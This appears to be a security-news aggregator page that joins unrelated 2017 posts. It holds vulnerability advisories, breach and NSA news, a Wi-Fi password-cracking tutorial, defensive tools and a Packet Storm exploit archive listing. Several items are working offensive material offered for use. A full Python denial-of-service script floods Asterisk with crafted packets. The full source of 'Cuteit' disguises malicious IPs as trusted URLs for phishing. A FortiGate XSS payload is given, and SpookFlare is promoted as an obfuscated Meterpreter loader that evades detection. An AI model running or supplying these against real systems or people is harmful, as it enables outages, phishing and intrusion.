could be high. Recommendations to vendor ------------------------- 1. In aws-cfn-bootstrap `cfn-hup` command set the `DaemonContext` umask to 077. 2. For existing installations, run `chmod -R go-rwx /var/lib/cfn-hup` as root. End user mitigation ------------------- 1. Upgrade aws-cfn-bootstrap to 1.4-22.14.amzn1 or or later 2. chmod -R go-rwx /var/lib/cfn-hup Credits ------- This vulnerability was discovered by Harry Sintonen / F-Secure Corporation. Timeline -------- 05.04.2017 spotted the 'rwxrwxrwx' directories, suspected a vulnerability 08.04.2017 found a way to exploit the vulnerability, wrote the PoC exploit 08.04.2017 wrote a preliminary advisory 19.04.2017 minor adjustments 03.05.2017 some fixes and clarifications 03.05.2017 reported to aws-security@amazon.com 04.05.2017 received response from the aws security team 12.05.2017 requested status of the issue 18.05.2017 requested status of the issue 25.05.2017 requested status of the issue 25.05.2017 received response: "appropriate actions are being taken" 01.06.2017 requested status of the issue 06.06.2017 received a response: "a fix has been is built, and will be deployed in the coming couple of weeks." 06.06.2017 requested CVE from MITRE 06.06.2017 MITRE assigned CVE-2017-9450 13.06.2017 forwarded the CVE number to aws-security@amazon.com 26.07.2017 AWS released a fix as ALAS-2017-861 - https://alas.aws.amazon.com/ALAS-2017-861.html 26.07.2017 notified AWS security about the incomplete fix: umask is still 0, leading to RCE as root via other vectors. sent a new proof of concept exploit utilizing such new vector 04.08.2017 AWS released an updated ALAS-2017-861 fix, fixing the vulnerability. the daemon umask is still 0 resulting in potential information disclosure or code execution vulns 14.09.2017 AWS released a fix to the umask issue as ALAS-2017-895 - https://alas.aws.amazon.com/ALAS-2017-895.html 29.11.2017 public release of the advisory Source: https://packetstormsecurity.com/files/145177/awscfnbootstrap-exec.txt

FortiGate SSL VPN Portal versions 5.6.2 and below, 5.4.6 and below, 5.2.12 and below, and 5.0 and below suffer from a cross site scripting vulnerability. ======================================================================= title: FortiGate SSL VPN Portal XSS Vulnerability product: Fortinet FortiOS vulnerable version: see: Vulnerable / tested versions fixed version: see: Solution CVE number: CVE-2017-14186 impact: Medium homepage: https://www.fortinet.com found: 2017-10-02 by: Stefan Viehböck (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "From the start, the Fortinet vision has been to deliver broad, truly integrated, high-performance security across the IT infrastructure. We provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our unique security fabric combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration." Source: https://www.fortinet.com/corporate/about-us/about-us.html Vulnerability overview/description: ----------------------------------- The FortiGate SSL VPN Portal is prone to a reflected cross-site scripting (XSS) vulnerability. The HTTP GET parameter "redir" is vulnerable. An attacker can exploit this vulnerability by tricking a victim to visit a URL. The attacker is able to hijack the session of the attacked user, and use this vulnerability in the course of spear-phishing attacks, e.g. by displaying a login prompt that sends credentials of victim back to the attacker. Note: This vulnerability is also an open redirect and is very similar to a vulnerability that was fixed in FortiOS in March 2016 (FG-IR-16-004). https://www.fortiguard.com/psirt/fortios-open-redirect-vulnerability Proof of concept: ----------------- The following request exploits the issue: https://vpn.<SERVER>.com/remote/loginredir?redir=javascript:alert(%22XSS%20%22%2Bdocument.location) The server responds with a page that looks as follows: --------------------------------------------------------------------------------------------------- <html><head> <script language="javascript"> document.location=decodeURIComponent("javascript%3Aalert%28%22XSS%20%22%2Bdocument.location%29"); </script> </head></html> --------------------------------------------------------------------------------------------------- Vulnerable / tested versions: ----------------------------- FortiOS 5.6.0 -> 5.6.2 FortiOS 5.4.0 -> 5.4.6 FortiOS 5.2.0 -> 5.2.12 FortiOS 5.0 and below More information can be found at: https://fortiguard.com/psirt/FG-IR-17-242 Vendor contact timeline: ------------------------ 2017-10-02: Contacting vendor through psirt@fortinet.com 2017-10-03: Vendor confirms vulnerability, assigns CVE-2017-14186. Expected fix in version 5.6.3 2017-11-23: Vendor provides update 2017-11-29: Coordinated public release of advisory Solution: --------- FortiOS 5.6 branch: Upgrade to upcoming 5.6.3 (ETA: November 27th) FortiOS 5.4 branch: Upgrade to 5.4.6 special build (*) or upcoming 5.4.7 (ETA Dec 7th) FortiOS 5.2 branch: Upgrade to 5.2.12 special build (*) or upcoming 5.2.13 (ETA: Dec 14th) More information can be found at: https://fortiguard.com/psirt/FG-IR-17-242 Workaround: ----------- Not available. # 0day.today [2017-12-04] # Source: 0day.today

A weak password is one that is short, common, or easy to guess. Equally bad are secure but reused passwords that have been lost by negligent third-party companies like Equifax and Yahoo. Today, we will use Airgeddon, a wireless auditing framework, to show how anyone can crack bad passwords for WPA and WPA2 wireless networks in minutes or seconds with only a computer and network adapter. To follow this guide, you'll need a wireless network adapter capable of monitor mode and packet injection. You will also need a computer capable of running VirtualBox, an open-source hypervisor, software that can create and run multiple virtual machines. This should be easy since VirtualBox has downloads for Windows, macOS, and Linux. You can also download a copy of Parrot Security OS (aka ParrotSec) to run in VirtualBox if you'd like everything to work like in our video guide below. If you want to download the ParrotSec ISO but you'd also like to stay off any NSA lists, you can always use a proxy server to download the image file while hiding your IP address. If you're already set up on Arch or Kali Linux, you can also install Airgeddon and any dependencies following the directions on GitHub, and then follow along. One thing to note: Airgeddon needs to open other windows to work, so this won't work via SSH (Secure Shell), only VNC (Virtual Networking Computer) or with a screen. As you can see in the video above, a WPA handshake can be grabbed in seconds, leaving the strength of your password as your last line of defense. If this can't stand up to a reasonable assault, your data is as good as gone if an attacker decides to knock on the door of your network. If you're looking for some help, there are plenty of ways to prevent yourself from being easy to attack with this method. Never reuse passwords, and always make sure to use secure passwords hackers won't like. Password managers like LastPass also allow you to create and sync secure passwords that are much harder to brute-force. Lastly, never share your Wi-Fi password when you don't need to, and change it regularly if you have to share your password at all. Thanks for watching, please subscribe to Null Byte on YouTube for more content, and happy cracking! Follow Null Byte on Twitter, Google+, and YouTube Follow WonderHowTo on Facebook, Twitter, Pinterest, and Google+ Source: https://null-byte.wonderhowto.com/how-to/video-crack-weak-wi-fi-passwords-seconds-with-airgeddon-parrot-os-0181434/

Global e-commerce business PayPal has disclosed a data breach that may have compromised personally identifiable information for roughly 1.6 million customers at a payment processing company PayPal acquired earlier this year. PayPal Holdings Inc. said Friday that a review of its recently acquired company TIO Networks showed evidence of unauthorized access to the company's network, including some confidential parts where the personal information of TIO's customers and customers of TIO billers stored. Acquired by PayPal for US$233 Million in July 2017, TIO Network is a cloud-based multi-channel bill payment processor and receivables management provider that serves the largest telecom, wireless, cable and utility bill issuers in North America. PayPal did not clear when or how the data breach incident took place, neither it revealed details about the types of information being stolen by the hackers, but the company did confirm that its platform and systems were not affected by the incident. The data breach in TIO Networks was discovered as part of an ongoing investigation for identifying security vulnerabilities in the payment processing platform. As soon as PayPal identified an unauthorized access to the TIO's network, PayPal took action by "initiating an internal investigation of TIO and bringing in additional third-party cybersecurity expertise to review TIO's bill payment platform," PayPal press release [PDF] reads. The company has begun working with companies it services to notify potentially affected customers. Besides notifying, the company is also working with a consumer credit reporting agency, Experian, to provide free credit monitoring memberships for fraud and identity theft to those who are affected by the breach. To protect its customers, TIO has also suspended its services until a full-scale investigation into the incident is completed. Since the investigation is ongoing, PayPal will communicate with TIO customers and merchant partners directly as soon as the company has more details on the incident. Also, the affected customers will be directly contacted by the company. Via thehackernews.com

arp-validator Security Tool to detect arp poisoning attacks Features Uses a faster approach in detection of arp poisoning attacks compared to passive approaches Detects not only presence of ARP Poisoning but also valid IP-MAC mapping (when LAN hosts are using non-customized network stack) Stores validated host for speed improvements Works as a daemon process without interfering with normal traffic Log's to any external file Architecture +-------------+ +---------------+ +------------+ | ARP packet | ARP Reply | Mac-ARP Header| Consistent | Spoof | | Sniffer | ------------> | consistency | --------------> | Detector | | | Packets | Checker | ARP Packets | | +-------------+ +---------------+ +------------+ | / Inconsistent / ARP Packets Spoofed | ARP Packets V / +--------------+ / | | / | Notifier | <---------- | | +--------------+ 1. Arp Packets Sniffer It sniffs all the ARP packets and discards ARP Request Packets ARP Reply packets sent by the machine itself which is using the tool (assuming host running the tool isn't ARP poisoning ) 2. Mac-ARP Header Consistency Checker It matches source MAC addresses in MAC header with ARP header destination MAC addresses in MAC header with ARP header If any of above doesn't match, then it will notified. 3. Spoof Detector It works on the basic property of TCP/IP stack. The network interface card of a host will accept packets sent to its MAC address, Broadcast address and subscribed multicast addresses. It will pass on these packets to the IP layer. The IP layer will only accept IP packets addressed to its IP address(s) and will silently discard the rest of the packets. If the accepted packet is a TCP packet it is passed on to the TCP layer. If a TCP SYN packet is received then the host will either respond back with a TCP SYN/ACK packet if the destination port is open or with a TCP RST packet if the port is closed. So there can be two type of packets: RIGHT MAC - RIGHT IP RIGHT MAC - WRONG IP (Spoofed packet) For each consistent ARP packet, we will construct a TCP SYN packet with destination MAC and IP address as advertised by the ARP packet with some random TCP destination port and source MAC and IP address is that of the host running the tool. If a RST(port is closed) or ACK(port is listening) within TIME LIMIT is received for the SYN then host(who sent the ARP packet) is legitimate. Else No response is received within TIME LIMIT so host is not legitimate and it will be notified. 4. Notifier It provides desktop notifications in case of ARP spoofing detection. Installation npm https://github.com/rnehra01/arp-validator/blob/master/docs/arp-results.jpg?raw=true source git clone https://github.com/rnehra01/arp-validator.git cd arp-validator npm install Use the binary in bin/ to run Usage [sudo] arp-validator [action] [options] actions: start start arp-validator as a daemon options: --interface, -i Network interface on which tool works arp-validator start -i eth0 or --interface=eth0 --hostdb, -d stores valid hosts in external file (absolute path) arp-validator start -d host_file or --hostdb=host_file --log, -l generte logs in external files(absolute path) arp-validator start -l log_file or --log=log_file stop stop arp-validator daemon status get status of arp-validator daemon global options: --help, -h Displays help information about this script 'arp-validator -h' or 'arp-validator --help' --version Displays version info arp-validator --version Dependencies libpcap-dev: library for network traffic capture node-pcap/node_pcap stephenwvickers/node-raw-socket indutny/node-ip scravy/node-macaddress codenothing/argv niegowski/node-daemonize2 mikaelbr/node-notifier Issues Currently, it is assumed that hosts are using non-customized network stack hence the malicious host won't respond the TCP SYN packet. But in case the malicious host is using a customized network stack, it can directly capture the TCP SYN packet from layer 2 and can respond with a self-constructed TCP RST or ACK hencour tool will validate the malicious host. If a host is using a firewall which allows TCP packets for only some specific ports, in that case a legitimate host also won't respond to the TCP SYN packet and tool will give a False Positive of ARP Poisoning Detection. References Vivek Ramachandran and Sukumar Nandi, “Detecting ARP Spoofing: An Active Technique” Source: https://github.com/rnehra01/arp-validator

This archive contains all of the 126 exploits added to Packet Storm in November, 2017. Content: actiontecc1000a-backdoor.txt aroxschoolerpphp-sql.txt asterisk13172-dos.txt AVAYA-OFFICE-IP-IPO-v9.1.0-10.1-SOFT-CONSOLE-REMOTE-BUFFER-OVERFLOW-0DAY.txt AVAYA-OFFICE-IP-IPO-v9.1.0-10.1-VIEWERCTRL-ACTIVE-X-BUFFER-OVERFLOW-0DAY.txt avgater-flaw.txt aztech-bypass.txt basicb2b-sql.txt cmslite14-sql.txt communigatepro-xss.txt coolplayer-2.19.6-bindshell-exploit.py.txt cpaleadreward-sql.txt csccart462-exec.txt CSNC-2017-029.txt CSNC-2017-030.txt CVE-2017-5124-master.zip CVE-2017-6331-SYMANTEC-ENDPOINT-PROTECTION-TAMPER-PROTECTION-BYPASS.txt cve_2017_8464_lnk_lpe.rb.txt debutembeddedhttpd120-dos.txt dell-escalate.txt divinglog6-xxe.txt dlink-850-admin-creds-retriever.sh.txt dlinkdc936l-xsrf.txt dlinkdir605l208-dos.txt dlink_dir850l_unauth_exec.rb.txt dmb23-dllhijack.txt dupscout10018-overflow.txt exim489-dos.txt fakemagazinecover-sql.txt freefloatftpd-exploit.py.txt geutebrueck_gcore_x64_rce_bo.rb.txt graphicsmagick-discloseoverflow.txt GS20171110181405.txt GS20171115170453.tgz GS20171115170601.tgz GS20171115170716.tgz GS20171116003633.txt GS20171116003938.txt GS20171116004108.txt GS20171116004241.txt GS20171121191436.tgz GS20171121191617.tgz GS20171122154332.txt GS20171122154609.txt GS20171122154803.txt GS20171122155126.txt GS20171122155447.txt GS20171122155626.txt GS20171122155815.txt GS20171122160017.txt GS20171125145922.txt GS20171125150442.txt GS20171125150614.txt GS20171125150745.txt GS20171125150941.txt GS20171125151104.txt GS20171125151523.txt GS20171128144437.tgz GS20171201024948.tgz hikvision-roguessid.txt HugeDirtyCowPOC-master.zip ibmlotusnotes-dos.rb.txt ikarus2167-escalate.txt ipswitchwsftpprof-overflow.txt isms230-sql.txt kirbycms-xss.txt KL-001-2017-022.txt linux413smepsmap-escalate.txt lms790-xss.txt makoserver_cmd_exec.rb.txt meaam13-sql.txt mkvalidator-dos.tgz monstra304-xss.txt mymagazineblogcms10-sql.txt newsmagblogcms10-sql.txt newspapermbcms10-sql.txt nicephpfaq-sql.txt octobercms10426-xsrf.txt oraclejavase-xxedisclose.txt oraclepsept-exec.txt pfsense2311-exec.txt pfsense_group_member_exec.rb.txt phpmyfaq2.9.9-exec.txt protectedlinks-sql.txt qemunbd-overflow.txt root_no_password.rb.txt rt-sa-2016-008.txt SA-20171114-0.txt SA-20171116-0.txt schoolcms100-upload.txt schoolcms100-xss.txt sera_1.2.sh.txt shareet-sql.txt smplayer17110-dos.txt synologysm52-exec.txt tic-overflow.tgz tnftp_savefile.rb.txt ulterius-traversal.txt uszipcodesdb-sql.txt viritexplorer-escalate.txt vivotekip-overflow.txt vxsearch10214-overflow.py.txt web2project33-xss.txt webviewer100193-upload.rb.txt whatsapp21752-dos.txt wpaafcbp13-xss.txt wpamptoolbox194-xss.txt wpamtythumb813-xss.txt wpappointments2222-xss.txt wpaptr11-xss.txt wpboozang100-xss.txt wpbreezingforms12742-xss.txt wpcartogiraffemap10-xss.txt wpdfdreddcointips111-xss.txt wpemagmc10-xss.txt wpinlink10-sql.txt wpjtrtrt41-sql.txt wpmigration1228-xss.txt wp_mobile_detector_upload_execute.rb.txt wpshtml5vp314-xss.txt wpuif12-xss.txt wpuserpro-bypass.txt wpwoocommerce2030-traversal.txt wpyoastseo-xss.txt X41-2017-006.txt xlightftp3885-overflow.txt zktimeweb20112280-xsrf.txt zktimeweb20112280-xss.txt ZSL-2017-5440.txt ztezxdsl831-bypass.txt zyxelpk5001z-backdoor.txt Download: https://packetstormsecurity.com/files/download/145175/1711-exploits.tgz

Several more variants of Ragtime appear in recently leaked documents. A leaked document shines new light on a surveillance program developed by the National Security Agency. The program, known as Ragtime, collects the contents of communications, such as emails and text messages, of foreign nationals under the authority of several US surveillance laws. Details of the program are held in the highest tiers of secrecy, known as exceptionally controlled information, with only a few NSA staffers having access to the program and its data. There were four known versions, according to a 2013 book, released just months before the first documents published from the cache of documents leaked by whistleblower Edward Snowden. Ragtime-A is said to involve the US-based collection of foreign-to-foreign counterterrorism data; Ragtime-B collects foreign government data that travels through the US; and Ragtime-C focuses on the nuclear counterproliferation effort. Another program stands for Ragtime-P, which is said to stand for the Patriot Act, which authorizes the collection of bulk metadata on calls and emails sent over the networks of telecom providers. A leaked court order showed Verizon was ordered to turn over customer call records to the NSA on a daily basis. Dozens of other companies have also been compelled to provide data for Ragtime. But the Ragtime program has many more versions -- including one that appears to involve Americans' data. The document was found buried in a virtual hard disk, discovered by UpGuard's Chris Vickery. The document seen by ZDNet, dated November 2011, shows the Ragtime program has eleven variants, including the four that were already known. The document alludes to Ragtime-BQ, F, N, PQ, S, and T. The eleventh version refers to Ragtime-USP. "USP" is a common term used across the intelligence community to refer to "US person," like a US citizen or lawful permanent resident. Image: ZDNet Americans are generally protected from government surveillance under the Fourth Amendment. A few exceptions exist, such as if the secretive Washington DC-based Foreign Intelligence Surveillance Court, which authorizes the government's spying activities, issues a warrant based on probable cause, such as if there is evidence of an American working for a foreign power. But the NSA has long "incidentally" collected data on Americans, reports and research have revealed. Ragtime dates back to 2002, according to a previously-leaked document. The program forms part of a wider collection of systems and databases under the STELLARWIND umbrella of warrantless surveillance programs, launched under the authority of then-president George W. Bush in response to the September 11, 2001 terrorist attacks. After a series of leaks in 2008 detailing the scope and breadth of STELLARWIND's domestic collection capability, Congress limited the government's surveillance powers. Changes to the law had an immediate impact on the Ragtime program. Although the government was barred from collecting new metadata on Americans under Ragtime-P, the NSA retained the data. Analysts with clearance were still permitted to search the database. Only a fraction of NSA staffers have the appropriate security clearance to access Ragtime's databases. One previously leaked document says analysts must have special "need to know" clearance to access the data, and any information relating to Ragtime is restricted from being shared to foreign intelligence partners. The exception is Ragtime-C, which the new document implies a level of co-operation from the UK government. The data stored in Ragtime's databases is so sensitive that their very existence is compartmentalized. The clearance level for each Ragtime version, according to the document, is "unpublished," in an effort to ensure that the programs themselves aren't widely known about across the agency. The NSA said in internal security guidance that unpublished classification markings are set for some programs "due to sensitivity and restrictive access controls." When reached, an NSA spokesperson declined to comment on Ragtime, or its purpose. News of the leak comes just weeks before Congress has to pass reforms or a reauthorization of the US government's surveillance laws. Lawmakers have until the end of the year to pass a bill to ensure powers under the Foreign Intelligence Surveillance Act are put back in the law books, or the NSA risks losing those powers at the end of the annual intelligence cycle. These are the same powers that authorized the controversial PRISM program, which collects data from servers of internet giants, the massive bulk collection of internet traffic, and the government's computer and network hacking powers. Several bills have already been floated by members of both the House and Senate. US intelligence chiefs are pushing for a permanent reauthorization of the surveillance powers, while privacy groups are fighting for greater transparency. Several members of Congress have vowed to fight the reauthorization until they learn how many Americans are swept up in section 702 surveillance. The government's spy chief has so far refused to say what that number is. Via http://www.zdnet.com/article/ragtime-program-appear-in-nsa-leaked-files/

Asterisk version 13.17.2~dfsg-2 suffers from a remote unauthenticated memory exhaustion vulnerability. # Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com # Date and time of release: Nov, 15 2017 # Found this and more exploits on my open source security project: http://www.exploitpack.com # # Tested on: Asterisk 13.17.2~dfsg-2 # # Description: Asterisk is prone to a remote unauthenticated memory exhaustion # The vulnerability is due to an error when the vulnerable application handles crafted SCCP packet. A remote attacker may be able to exploit this to cause a denial of service condition on the affected system. # # [Nov 29 15:38:06] ERROR[7763] tcptls.c: TCP/TLS unable to launch helper thread: Cannot allocate memory # # Program: Asterisk is an Open Source PBX and telephony toolkit. It is, in a # sense, middleware between Internet and telephony channels on the bottom, # and Internet and telephony applications at the top. # # Homepage: http://www.asterisk.org/ # Filename: pool/main/a/asterisk/asterisk_13.17.2~dfsg-2_i386.deb # # Example usage: python asteriskSCCP.py 192.168.1.1 2000 import binascii import sys import socket import time def asteriskSCCP(target,port): try: while 1: # Open socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Set reuse ON s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Bind port s.connect((target, port)) print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Connected to:"), target, port print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Establishing connection.. ") packet = binascii.unhexlify(b'450002c50001000040067a307f0000017f000001001407d00000000000000000500220009a2b0000e4eea8a72a97467d3631824ac1c08c604e762eb80af46cc6d219a4cf65c13992b4a8af94cb5e87c14faf0254cba25af9fb33bd8d2a58e370e3a866639dfdec350875cfecfe068a16746963fffeee0fdcbac75eb4f09d625f3ae1b4a3eb2812e6f838e88b0d7d9881465a0faf45664df8008d4d6de1a5e20a9c97a71f57d3429e0b17db3aeb3bf516ca4e207a5c801d04132979508f267c7425a57fd0edd271b57ff9831b595b519e73404f170492ae3ad438d4aeca854e96c9dd56d2af3813b8de6b3d8d31d32c0e95be9cb3a5c6106f64c4f19cda2b55ad1471f3d63e1b1ca3c29f362def063ad9b29ea4d1c1fda5c2e4cf0ae75064c27411a2deb5fab11e6412cd5a4037f38779f0173fa1f2ca1740aa78fe37bc0a50f5619c7abba00f2957bf06770ff4d6c003d4533de19f51bcbbd9bbe0ceb3e17dd180e58ee2698998edca42e3d6a8079cc151b608e5bd5aff052e718e714b360f9b091894a5eeed34dafe41d27f19988b3e0ac5a6dd8947c3537ae31154e983cdbac0861afc500206e74030c9e452738ece13075df2dbebb8a1737ee3b4880bc6d428ee2d3d64f585e197dc63f30638a4c55cff0b8e6aa82dfdf199baabd92c10092414015fad5f08e9c816a4d028574ee5340c08b2fe65ca1e7ca907ea2ebd6661e01e9b9d39d5bdb3e3cebd58e96f97f487bb580bcf5447ac48a2ad5541ae0ddcc9ec1f9528f2c07316dbd760e91e3bddbd53fbf6987fdba0830bdb485524950b5611e18e5d517c0f3ae05aa2daec42a5c43eab07aa0018ab750dc6995adad6561cc8a0379f7a12d8e5e474df013459442801d6871c5820318d790833687619b70b0da74893ca441f177ab9e7d7a537c6ff4920c79631905c35167d8a6efc0c6bced9270691abc5b4de84f956f8c1d34f9ef3f0073dafce8c076c4d537e981a1e8ff6ed3e8c') # Log the packet in hexa and timestamp fileLog = target + ".log" logPacket = open(fileLog, "w+") logPacket.write("["+time.strftime('%a %H:%M:%S')+"]"+ " - Packet sent: " + binascii.hexlify(bytes(packet))+"\n") logPacket.close() # Write bytecodes to socket print("["+time.strftime('%a %H:%M:%S')+"]"+" - "+"Packet sent: ") s.send(bytes(packet)) # Packet sent: print(bytes(packet)) try: data = s.recv(4096) print("[" + time.strftime('%a %H:%M:%S') + "]" + " - "+ "Data received: '{msg}'".format(msg=data)) except socket.error, e: print 'Sorry, No data available' continue s.close() except socket.error as error: print error print "Sorry, something went wrong!" def howtouse(): print "Usage: AsteriskSCCP.py Hostname Port" print "[*] Mandatory arguments:" print "[-] Specify a hostname / port" sys.exit(-1) if __name__ == "__main__": try: # Set target target = sys.argv[1] port = int(sys.argv[2]) print "[*] Asterisk 13.17 Exploit by Juan Sacco " print "[*] Red Team KPN <juan.sacco@kpn.com> " asteriskSCCP(target, port) except IndexError: howtouse() Source: https://packetstormsecurity.com/files/145149/Asterisk-13.17.2-dfsg-2-Memory-Exhaustion.html

A simple python tool to help you while social engineering with converting your malicious ip to many forms Screenshot Download: Cuteit-master.zip Mirror: #Author:D4Vinci def ip2long(ip): ip = ip.split("/")[0].split(":")[0] p = ip.split(".") return str( ( ( ( ( int(p[0]) * 256 + int(p[1]) ) * 256 ) + int(p[2]) ) * 256 ) + int(p[3])) #p[0] + "." + str( ( ( ( int( p[1] ) * 256 + int( p[2] ) ) * 256 ) + int( p[3] ) ) * 256 ), #p[0] + "." + p[1] + str( ( int( p[2] ) *256 ) + int( p[3] ) ) def ip2hex(ip): ip = ip.split("/")[0].split(":")[0] p = ip.split(".") return [str( hex( int(p[0]) ) ) +"."+ str( hex( int(p[1]) ) ) +"."+ str( hex( int(p[2]) ) ) +"."+ str( hex( int(p[3]) ) ), str( hex( int(p[0]) ) ) +"."+ str( hex( int(p[1]) ) ) +"."+ str( hex( int(p[2]) ) ) +"."+ str( int(p[3]) ), str( hex( int(p[0]) ) ) +"."+ str( hex( int(p[1]) ) ) +"."+ str( int(p[2]) ) +"."+ str( int(p[3]) ), str( hex( int(p[0]) ) ) +"."+ str( int(p[1]) ) +"."+ str( int(p[2]) ) +"."+ str( int(p[3]) ), "0x"+"0"*8+str( hex( int(p[0]) ) ).replace("0x","") +"."+ "0x"+"0"*6+str( hex( int(p[1]) ) ).replace("0x","") +"."+ "0x"+"0"*4+str( hex( int(p[2]) ) ).replace("0x","")+"."+ "0x"+"0"*2+str( hex( int(p[3]) ) ).replace("0x",""), str( hex( int( ip2long( ip ) ) ) ).replace( "L" , "" )] def ip2Octal(ip): return '.'.join(format(int(x), '04o') for x in ip.split('.')) def ip_as_urlencoded(ip): ip = ip.split("/")[0] en="" for i in ip : if i.isdigit() : en += "%3{}".format(i) elif i == "." : en += "%2E" elif i == ":" : en += "%3A" return en def ip_as_url(ip): return [ "http://howsecureismypassword.net@"+str(ip), "http://google.com@"+str( ip2long( ip ) ), "http://facebook.com@"+str( ip2hex( ip )[-1] ), "http://"+str( ip_as_urlencoded(ip) ), "https://www.google.com@search@"+str( ip_as_urlencoded(ip) ), "http://anywebsite@"+str( ip2Octal(ip) )] print "\n Cuteit - Make a malicious ip a bit cuter :D" print " Note:don't type a long url because it's converts the ip only.!" ip = raw_input(" ip > ") ip=ip.replace("http://","") print "\n" for n,i in enumerate( ip2hex(ip) + ip_as_url(ip) ): if "http" not in i: print " ["+str(n)+"] "+"http://"+i else: print " ["+str(n)+"] "+i print " [12] http://" + ip2Octal(ip) print " [13] http://" + ip2long(ip) https://github.com/D4Vinci/Cuteit

//mai bine nu. Trash

This talk was performed on 7 July 2017 at Camp++ 0x7e1, MKV downloads and presentation slides are available at https://camp.hsbp.org/2017/pp7e1/fahrplan/events/31.html

The GOSINT framework is a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). GOSINT allows a security analyst to collect and standardize structured and unstructured threat intelligence. Applying threat intelligence to security operations enriches alert data with additional confidence, context, and co-occurrence. This means that you apply research from third parties to security event data to identify similar, or identical, indicators of malicious behavior. The framework is written in Go with a JavaScript frontend. Installation Please find the installation procedure at http://gosint.readthedocs.io/en/latest/installation.html There are three ways to get up and running: Bash install script Docker Manual installation Updates Updating is simple and encouraged as bugs are reported and fixed or new features are added. To update your instance of GOSINT, pull the latest version of GOSINT from the repository and re-run the build command to compile the updated binary. godep go build -o gosint Configuration GOSINT needs some quick initial configuration to start making use of the framework features. All the settings you will need to specify can be found under the "Settings" tab. Please find the configuration procedure at http://gosint.readthedocs.io/en/latest/configuration.html Use Please find the instructions for use at http://gosint.readthedocs.io/en/latest/use.html Download: GOSINT-master.zip Source: https://github.com/ciscocsirt/GOSINT

SpookFlare has a different perspective to bypass security measures and it gives you the opportunity to bypass the endpoint countermeasures at the client-side detection and network-side detection. SpookFlare is a loader generator for Meterpreter Reverse HTTP and HTTPS stages. SpookFlare has custom encrypter with string obfuscation and run-time code compilation features so you can bypass the countermeasures of the target systems like a boss until they “learn” the technique and behavior of SpookFlare payloads. Obfuscation Runtime Code Compiling Source Code Encryption Patched Meterpreter Stage Support ___ ___ ___ ___ _ __ ___ _ _ ___ ___ / __| _ \/ _ \ / _ \| |/ / | __| | /_\ | _ \ __| \__ \ _/ (_) | (_) | ' < | _|| |__ / _ \| / _| |___/_| \___/ \___/|_|\_\ |_| |____/_/ \_\_|_\___| Version : 1.0 Author : Halil Dalabasmaz WWW : artofpwn.com Twitter : @hlldz Github : @hlldz Licence : Apache License 2.0 Note : Stay in shadows! ------------------------------------------------------- [*] You can use "help" command for access help section. spookflare > help list : List payloads generate : Generate payloads exit : Exit from program [!] Important: Use x86 listener for x86 payloads and x64 listener for x64 payloads otherwise the process will crash! spookflare > list SpookFlare can generate following payloads. [*] Meterpreter Loader (.EXE) with Custom Encrypter and Custom Stub: - Meterpreter Reverse HTTP x86/x64 - Meterpreter Reverse HTTPS x86/x64 Technical Details https://artofpwn.com/spookflare.html Usage Video Download: SpookFlare-master.zip Source: https://github.com/hlldz/SpookFlare

» ondevice ssh just like ssh, but for devices without public IP run commands and copy files just like you’d normally do with ssh, rsync, scp or sftp, no matter where your devices are sign up now and get 5 devices + 5GB/month for free! Sing Up Source: http://ondevice.io/